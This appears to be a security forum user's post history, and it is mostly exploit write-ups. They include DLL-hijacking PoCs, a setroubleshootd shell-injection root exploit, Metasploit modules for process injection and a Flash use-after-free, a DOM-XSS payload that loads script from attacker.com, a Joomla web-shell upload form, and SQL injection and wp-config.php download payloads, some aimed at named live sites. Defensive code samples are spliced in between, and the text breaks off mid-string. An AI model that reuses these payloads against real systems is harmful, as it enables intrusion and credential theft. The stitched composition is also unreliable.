Aerosol
Active Members
Posts: 3453
Days Won: 22

Everything posted by Aerosol

1.
/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking
#[+] Date: 28-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Poc: http://i.imgur.com/naHAdJF.png
#[+] Compile the file, rename the result to daemon.dll, then create a .iso file; make sure
#    the two files are in the same directory.
*/
#include <windows.h>
#include <stdlib.h>

#define DllExport __declspec(dllexport)

/* Payload: launch calc.exe, then terminate the host process. */
static int payload(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Export that UltraISO resolves from daemon.dll. When the planted DLL is loaded
   from the directory of the opened .iso, the application calls this and the
   payload runs inside the UltraISO process. */
DllExport void hook_startup(void)
{
    payload();
}
2.
/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: BZR Player 1.03 DLL Hijacking
#[+] Date: 29-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://bzrplayer.blazer.nu/
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o [DLLNAME, choose one from the list below].dll tcyber.c
#    Copy it to the software directory, then execute the software; calc.exe will launch.

#Vulnerable and Exploitable DLLs:
# codec_aiff.dll codec_asf.dll codec_cdda.dll codec_dls.dll codec_flac.dll codec_fsb.dll codec_it.dll
# codec_midi.dll codec_mod.dll codec_mpeg.dll codec_oggvorbis.dll codec_playlist.dll codec_s3m.dll
# codec_sf2.dll codec_tag.dll codec_tremor.dll codec_vag.dll codec_xm.dll codec_.dll
# dsp_chorus.dll dsp_compressor.dll dsp_delay.dll dsp_distortion.dll dsp_dolbyheadphones.dll dsp_echo.dll
# dsp_fft.dll dsp_flange.dll dsp_highpass.dll dsp_itecho.dll dsp_lowpass.dll dsp_lowpass2.dll
# dsp_lowpass_simple.dll dsp_normalize.dll dsp_oscillator.dll dsp_parameq.dll dsp_pitchshift.dll
# dsp_reverb.dll dsp_sfxreverb.dll dsp_tremolo.dll
# output_asio.dll output_dsound.dll output_nosound.dll output_nosound_nrt.dll output_wasapi.dll
# output_winmm.dll output_writer.dll output_writer_nrt.dll

#Proof of Concept (PoC):
=======================
*/
#include <windows.h>
#include <stdlib.h>

/* Payload: launch calc.exe, then terminate the host process. */
static int tunisian(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Runs as soon as BZR Player loads the planted DLL. The payload exits the
   process, so fdwReason is never checked and the return value is never reached. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    tunisian();
    return 0;
}
3. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin about which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain).

In util.py (around line 266) we have:

def get_rpm_nvr_by_file_path_temporary(name):
    if name is None or not os.path.exists(name):
        return None

    nvr = None
    try:
        import commands
        rc, output = commands.getstatusoutput("rpm -qf '%s'" % name)
        if rc == 0:
            nvr = output
    except:
        syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name)
    return nvr

(and other similar occurrences)

So. Yes, that's correct: the SELinux system that is only there to protect you passes attacker-controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root.

Let that sink in...

I attached a PoC which uses NetworkManager's openvpn plugin to execute arbitrary commands by triggering an access violation on a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when it is shipped enforcing by default.

Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc).

Sebastian

PS: I am all for SELinux but there's something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than what's framed around it in python, running as root and mangling attacker-controlled input. IOW, the system that wants to protect you has less code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and the interpreter that can have bugs of their own.

Driving such a lane _can only lead to abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within.

PPS: bug-logo will follow

--
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer () suse de - SuSE Security Team

#!/usr/bin/perl
#
# Fedora21 setroubleshootd local root PoC
#
# (C) 2015 Sebastian Krahmer
#
# - requires polkit authorization to add/mod VPN connections
#   to NetworkManager (default on desktop user)
# - after execution of this script, which adds appropriate
#   NM connection entries, try
#
#   $ nmcli c up vpn-FOOBAR
#
#   a couple of times, until you see:
#
#   logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:...
#
#   in the journalctl logs
#
# PS: I know in advance what the SELinux developers will say...
#
# I say: lulz!

# create a pathname that setroubleshootd will eventually
# query sh -c { rpm -qf ... with, fucking up ' escaping. So the
# embedded pathname is then evaluated as command
#
# There goes your NSA-grade SELinux security!!!
$file = "/tmp/foo.pem';`id|logger`;echo '";

open(O, ">", $file) or die $!;
close O;

# add connection
system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn");

open(O,"|nmcli c edit vpn-FOOBAR") or die $!;
print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n";
print O "set vpn.secrets password=1\nsave\nquit\n";
close(O);

print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n";
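The bug class in the post above, reduced to a runnable demonstration. This is example code added here, not part of Sebastian Krahmer's report or of setroubleshoot: `echo` stands in for `rpm -qf` so nothing package-related is needed, and the file name is constructed to have the same shape as the PoC's pathname but with a harmless marker command. The vulnerable function reproduces the `"... '%s'" % name` pattern from util.py; the two fixes are the ones a reviewer would ask for, an argv list with no shell, or `shlex.quote()` when a shell is unavoidable.

```python
"""Shell injection via string-formatted file names, vulnerable and fixed.

Example code, not from setroubleshoot. `echo` replaces `rpm -qf`; the
attacker-controlled name below is constructed for the demo."""
import shlex
import subprocess
from typing import List

# Constructed attacker-controlled path name. Same shape as the PoC's
# "/tmp/foo.pem';`id|logger`;echo '" but the injected command only echoes.
PAYLOAD_NAME = "/tmp/foo.pem';echo INJECTED;echo '"


def rpm_query_vulnerable(name: str) -> List[str]:
    """Mirrors util.py: format the name into a string and hand it to sh -c.
    The single quote inside `name` closes the quoted argument, so the rest
    of the string is parsed by the shell as further commands."""
    cmd = "echo QUERY '%s'" % name  # same pattern as "rpm -qf '%s'"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def rpm_query_argv(name: str) -> List[str]:
    """Fix 1: no shell at all. The name is a single argv element whatever
    it contains, so the program receives it byte for byte."""
    out = subprocess.run(["echo", "QUERY", name], capture_output=True, text=True)
    return out.stdout.splitlines()


def rpm_query_quoted(name: str) -> List[str]:
    """Fix 2: if a shell is unavoidable, quote with shlex.quote(), which
    re-quotes embedded single quotes so they cannot end the argument."""
    cmd = "echo QUERY %s" % shlex.quote(name)
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


if __name__ == "__main__":
    # The vulnerable call prints a second line, INJECTED, that the program
    # never asked for; both fixes print the whole name as one argument.
    print("vulnerable:", rpm_query_vulnerable(PAYLOAD_NAME))
    print("argv      :", rpm_query_argv(PAYLOAD_NAME))
    print("quoted    :", rpm_query_quoted(PAYLOAD_NAME))
```

The argv form is the right default: it removes the shell from the picture, so there is no quoting to get wrong, and it is also what `subprocess.check_output(["rpm", "-qf", name])` would do in the real daemon.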
4.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  include Msf::Post::Windows::Runas
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Windows Run Command As User",
      'Description'    => %q{
        This module will login with the specified username/password and execute the
        supplied command as a hidden process. Output is not returned by default.
        Unless targeting a local user either set the DOMAIN, or specify a UPN user
        format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI
        function.

        A custom command line can be sent instead of uploading an executable.
        APPLICATION_NAME and COMMAND_LINE are passed to lpApplicationName and
        lpCommandLine respectively. See the MSDN documentation for how these two
        values interact.
      },
      'License'        => MSF_LICENSE,
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Author'         => ['Kx499', 'Ben Campbell'],
      'Targets'        => [[ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ]],
      'DefaultTarget'  => 0,
      'References'     => [
        [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ]
      ],
      'DisclosureDate' => 'Jan 01 1999' # Not valid but required by msftidy
    ))

    register_options(
      [
        OptString.new('DOMAIN',           [false, 'Domain to login with' ]),
        OptString.new('USER',             [true,  'Username to login with' ]),
        OptString.new('PASSWORD',         [true,  'Password to login with' ]),
        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]),
        OptString.new('COMMAND_LINE',     [false, 'Command line to execute (lpCommandLine)', nil ]),
        OptBool.new('USE_CUSTOM_COMMAND', [true,  'Specify custom APPLICATION_NAME and COMMAND_LINE', false ])
      ], self.class)
  end

  def exploit
    fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter'
    fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system?

    domain   = datastore['DOMAIN']
    user     = datastore['USER']
    password = datastore['PASSWORD']

    if datastore['USE_CUSTOM_COMMAND']
      application_name = datastore['APPLICATION_NAME']
      command_line     = datastore['COMMAND_LINE']
    else
      command_line = nil
      windir = get_env('windir')
      # Select the executable to run depending on the architecture; the payload is
      # x86, so on x64 hosts the 32-bit notepad.exe from SysWOW64 is used.
      case sysinfo['Architecture']
      when /x86/i
        application_name = "#{windir}\\System32\\notepad.exe"
      when /x64/i
        application_name = "#{windir}\\SysWOW64\\notepad.exe"
      end
    end

    pi = create_process_with_logon(domain, user, password, application_name, command_line)
    return unless pi

    begin
      return if datastore['USE_CUSTOM_COMMAND']

      vprint_status('Injecting payload into target process')
      raw = payload.encoded
      process_handle = pi[:process_handle]

      virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle, nil, raw.length, 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
      address = virtual_alloc['return']
      fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0

      write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle, address, raw, raw.length, 4)
      fail_with(Exploit::Failure::Unknown, "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return']

      create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle, nil, 0, address, nil, 0, 4)
      if create_remote_thread['return'] == 0
        print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}")
      else
        print_good("Started thread in target process")
      end
    ensure
      session.railgun.kernel32.CloseHandle(pi[:process_handle])
      session.railgun.kernel32.CloseHandle(pi[:thread_handle])
    end
  end
end
5.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player ByteArray With Workers Use After Free',
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, which can fill the memory and notify the
        main thread to corrupt the new contents. This module has been tested successfully
        on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Unknown',      # Vulnerability discovery and exploit in the wild
        'hdarwin',      # Public exploit by @hdarwin89 (all the magic)
        'juan vazquez'  # msf module
      ],
      'References'     => [
        ['CVE', '2015-0313'],
        ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
        ['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
        ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
      ],
      'Payload'        => { 'DisableNops' => true },
      'Platform'       => 'win',
      'BrowserRequirements' => {
        :source  => /script|headers/i,
        :os_name => OperatingSystems::Match::WINDOWS_7,
        :ua_name => Msf::HttpClients::IE,
        :flash   => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
        :arch    => ARCH_X86
      },
      'Targets'        => [[ 'Automatic', {} ]],
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 02 2015',
      'DefaultTarget'  => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }
    swf
  end
end
6.
######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================
The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA. Those affected by this advisory are :
- NASA's video gallery on main domain : DOM Cross-Site Scripting (RXSS)

Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in the nasa.gov main domain above. Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA users' credentials such as cookies.

These reflected XSS are on GET variables and are not properly sanitized before being used in the page.

NASA's main portal - video gallery - PoC :
=======================================================================================
- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />

Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png

Solution:
=======================================================================================
Fixed by NASA Portal's team.

Additional resources :
=======================================================================================
- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com

Report timeline :
=======================================================================================
2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================
www.synetis.com
Consulting firm in management and information security

Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com
7.
######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# Date: 10.03.2015
# Exploit Author: CrashBandicot @DoSPerl
# OSVDB-ID: 119624
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
# Version: 1
# Tested on: Windows
######################################################################

# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php

20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))

# The upload directory is taken straight from the request (jpath) and URL-decoded, so
# a traversal sequence moves the uploaded file to any directory the web server can write.

# Exploit :

<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
  <input type="file" name="uploadfile"><br>
  <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
  <input type="submit" name="Submit" value="Pwn!">
</form>

# The name of the shell is shown after clicking "Pwn!"; the name is random (eg : backdoor__FDSfezfs.php)
# Shell Path : http://localhost/backdoor__[RandomString].php
8. Congratulations @Gecko; although we have had some disagreements, I admit you deserve your rank (you have proven it through your knowledge and your involvement in the community). I know how you were before, as S.Mod, and I can only wish you the best of luck.
9. I received the package yesterday.
10. Do you realize how often your smartphone is sharing your location data with various companies? It is more than 5000 times in just two weeks. That is a little shocking, but true!

A recent study by security researchers from Carnegie Mellon reveals that a number of smartphone applications collect your location-related data, a lot more than you think. The researchers released a warning against the alarming approach: "Your location [data] has been shared 5,398 times with Facebook, GO Launcher EX, Groupon and seven other [applications] in the last 14 days."

During their study, the researchers monitored 23 Android smartphone users for three weeks.

First Week - Participants were asked to use their smartphone apps as they would normally do.
Second Week - An app called App Ops was installed to monitor and manage the data those apps were using.
Third Week - The team of researchers started sending a daily "privacy nudge" alert that would ping participants each time an app requested location-related data.

Researchers concluded:
- Some apps for Android are tracking the user's movements every three minutes.
- Some apps for Android are attempting to collect more data than they need.
- Groupon, a deal-of-the-day app, requested one participant's coordinates 1,062 times in two weeks.
- Weather Channel, a weather report app, asked for the device location an average of 2,000 times, or every 10 minutes.

The participants were unaware of how closely they were being tracked by different apps, and many were surprised by the end results. Another participant wrote, "The number (356 times) was huge, unexpected."

The research team found that privacy-managing software helped manage access to data. When the members were granted access to App Ops, they collectively checked their app permissions 51 times and restricted 272 permissions on 76 different apps. Just one of the participants failed to review permissions.

As for user behaviour, once the participants had made the changes to the app permissions, they hardly looked at them again after a few days. With the help of the App Ops privacy app, in the span of eight days the participants collectively reviewed app permissions 69 times, blocking 122 additional permissions on about 47 different apps.

Ultimately, the team believes that if users begin getting the privacy nudges on a daily basis, they will definitely go back to their privacy settings and restrict the apps that are tracking them most closely.
11.
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################

# parameter 'theme_id' in GET vulnerable

# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload :

index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

# ====================================================================================

# parameter 'image_id' in POST vulnerable

# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload:

image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search

# ~ Demo ~
# $> http://www.cnct.tg/
#    http://www.nswiop.nsw.edu.au/
#    http://cnmect.licee.edu.ro/

#EOF
13.
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type: WebApp
[+]Risk: High

[+]Overview:
Contact Form Maker v1.0.1 suffers from an SQL injection vulnerability.

[+]Proof Of Concept:
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
14.
[+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability
[+] Exploit Author: Ashiyane Digital Security Team
[+] Vendor Homepage: https://wordpress.org/plugins/aspose-doc-exporter/developers/
[+] Download Link: https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
[+] Tested on: Windows, Linux
[+] Date: 2015-03-28
[+] Discovered By: ACC3SS

[+] Exploit:

[+] Vulnerable file: http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php

[+] Vulnerable Code:

<?php
// $file comes straight from the query string and is passed to readfile() with no
// check that it points inside the upload directory, so any file the web server
// can read is returned.
$file = $_GET['file'];
$file_arr = explode('/', $file);
$file_name = $file_arr[count($file_arr) - 1];
header("Content-type: octet/stream");
header("Content-disposition: attachment; filename=" . $file_name . ";");
header("Content-Length: " . filesize($file));
readfile($file);
exit;
?>

[+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]

[+] Example:
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
15.
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from an Arbitrary File Download vulnerability

######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
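Posts 7, 14 and 15 above share one root cause: a path taken from the request (the `jpath` upload directory, the `file` download parameter, the `img` parameter) is handed to the file system without checking that it stays inside the directory the feature is meant to serve. The containment check that is missing in all three, as an added example that is not code from any of the plugins: it URL-decodes first (the Joomla uploader `urldecode()`s `jpath`, so the check has to see what the file system will see), resolves `..` and symlinks with `realpath`, and compares on a path boundary. The directory layout and file contents are constructed in a temporary directory so the demo runs offline.

```python
"""Path containment for user-supplied file names, with the traversal,
URL-encoded traversal and symlink cases that the plugins above miss.
Example code added for this page; the sample files are constructed."""
import os
import tempfile
from typing import Dict, Optional
from urllib.parse import unquote


def resolve_inside(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path for `user_path` if it stays inside
    `base_dir` after URL-decoding and .. / symlink resolution, else None."""
    decoded = unquote(user_path)
    # An embedded NUL truncates the name in C-based file APIs, so the path
    # checked would not be the path opened. Refuse it outright.
    if "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops `base` entirely when the second part is absolute,
    # so strip leading separators to force a relative join.
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/\\")))
    # Compare on a path boundary: "/srv/app" must not admit "/srv/app2".
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def serve_file(base_dir: str, user_path: str) -> Optional[bytes]:
    """Hardened counterpart of readfile($_GET['file']): only regular files
    inside base_dir are returned."""
    target = resolve_inside(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> Dict[str, Optional[bytes]]:
    """Constructed layout: <tmp>/uploads is the only directory the download
    endpoint may read; <tmp>/wp-config.php is the secret one level up."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(uploads, "photo.jpg"), "wb") as fh:
        fh.write(b"JPEGDATA")
    secret = os.path.join(root, "wp-config.php")
    with open(secret, "wb") as fh:
        fh.write(b"<?php define('DB_PASSWORD', 'secret');")
    # A symlink planted inside the allowed directory must not escape either.
    link = os.path.join(uploads, "link.php")
    try:
        os.symlink(secret, link)
    except (OSError, NotImplementedError):
        pass  # platform without symlinks; the other cases still apply
    return {
        "photo.jpg": serve_file(uploads, "photo.jpg"),
        "../wp-config.php": serve_file(uploads, "../wp-config.php"),
        "..%2Fwp-config.php": serve_file(uploads, "..%2Fwp-config.php"),
        "absolute path": serve_file(uploads, secret),
        "link.php": serve_file(uploads, "link.php"),
    }


if __name__ == "__main__":
    for request, body in demo().items():
        print("%-20s -> %r" % (request, body))
```

Only `photo.jpg` comes back; every other request returns `None`. Note that the check is done on the decoded, resolved path and the same resolved path is then opened, which is what keeps the check and the open from disagreeing.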
16.
/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking
#[+] Date: 29-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o dwmapi.dll tcyber.c
#    Copy it to the software directory, then execute the software; calc.exe will launch.

Proof of Concept (PoC):
=======================
*/
#include <windows.h>
#include <stdlib.h>

/* Payload: launch calc.exe, then terminate the host process. */
static int tunisian(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Runs as soon as the application loads the planted dwmapi.dll from its own
   directory instead of System32. The payload exits the process, so fdwReason
   is never checked and the return value is never reached. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    tunisian();
    return 0;
}
17.
/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking
#[+] Date: 28-03-2015
#[+] Type: Local Exploits
#[+] Vendor: https://httrack.com/page/2/fr/index.html
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Compile the file, rename the result to dwmapi.dll, then create a .whtt file; make sure
#    the two files are in the same directory.
*/
#include <windows.h>
#include <stdlib.h>

#define DllExport __declspec(dllexport)

/* Payload: launch calc.exe, then terminate the host process. */
static int payload(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Export that HTTrack resolves from dwmapi.dll. When the planted DLL is loaded
   from the directory of the opened .whtt project file, the application calls
   this and the payload runs inside the HTTrack process. */
DllExport void hook_startup(void)
{
    payload();
}
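The four DLL hijacking advisories on this page (UltraISO, BZR Player, ZIP Password Recovery, HTTrack) all rest on the same observation: the application asks the loader for a DLL by name, the loader probes the application directory (or the directory of the opened document) before the system directories, and that probe fails, so a file planted there wins. The usual way to find such names is a Process Monitor capture filtered on `CreateFile` results of `NAME NOT FOUND` for `.dll` paths. The parser below, as an added example that is not part of TUNISIAN CYBER's advisories, does that over a procmon CSV export and separates application-directory probes (plant the DLL next to the executable, as in posts 2 and 16) from probes of another directory such as the one holding an opened document (the `.iso` / `.whtt` variant of posts 1 and 17). The CSV sample is constructed to look like a procmon export; the process name, PID and paths are made up.

```python
"""Locate DLL-hijack candidates in a Process Monitor CSV export.

Example code added for this page, not from the advisories above. Capture
with procmon, filter on the target process, export as CSV, then feed the
file to hijack_candidates(). SAMPLE_PROCMON_CSV is a constructed sample in
the export's column layout, not a real capture."""
import csv
import io
import ntpath
from typing import Dict, List, Tuple

SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
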